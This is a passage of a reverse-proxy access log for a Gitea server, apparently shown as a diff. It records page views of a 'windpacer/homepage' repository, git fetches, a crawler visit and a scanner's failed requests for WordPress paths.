Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11697] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:35 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:35 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:35 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:35 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:35 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:35 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:36 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:36 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:36 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:36 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:36 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92" [Client 222.117.41.51] [Length 50439] [Gzip 11.37] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/orginalSVG/CV.svg" [Client 222.117.41.51] [Length 7151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/path.png" [Client 222.117.41.51] [Length 101333] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/orginalSVG/XV.svg" [Client 222.117.41.51] [Length 6740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 40] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:14:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20356] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:14:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17524] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 31459] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 31459] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 31459] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html?only_content=true" [Client 222.117.41.51] [Length 7725] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html?sub_path=" [Client 222.117.41.51] [Length 11985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html?only_content=true" [Client 222.117.41.51] [Length 7685] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/README.md?only_content=true" [Client 222.117.41.51] [Length 4649] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf?only_content=true" [Client 222.117.41.51] [Length 4958] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/npm?sub_path=" [Client 222.117.41.51] [Length 2531] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 31459] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:14:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 79] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:18:16:04 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 54.227.223.64] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" -[18/Feb/2026:18:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 54.227.223.64] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 121.139.173.148] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 121.139.173.148] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 121.139.173.148] [Length 11696] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:01 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:01 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:01 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:01 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:02 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:02 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:02 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:02 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:02 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 121.139.173.148] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 121.139.173.148] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:55:04 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 45.92.1.85] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 45.92.1.85] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9359] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 45.92.1.85] [Length 9346] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 45.92.1.85] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9371] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9364] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:09 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:09 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:09 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9367] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:10 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:10 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:10 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:10 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:20:55:11 +0000] - - 400 - - https git.hanmocnn.co.kr "-" [Client 45.92.1.85] [Length 0] [Gzip -] [Sent-to ] "-" "-" -[18/Feb/2026:21:17:06 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:21:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:21:17:06 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[19/Feb/2026:00:16:32 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[19/Feb/2026:00:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[19/Feb/2026:00:16:34 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[19/Feb/2026:00:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 34.90.191.83] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[19/Feb/2026:01:36:38 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[19/Feb/2026:01:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 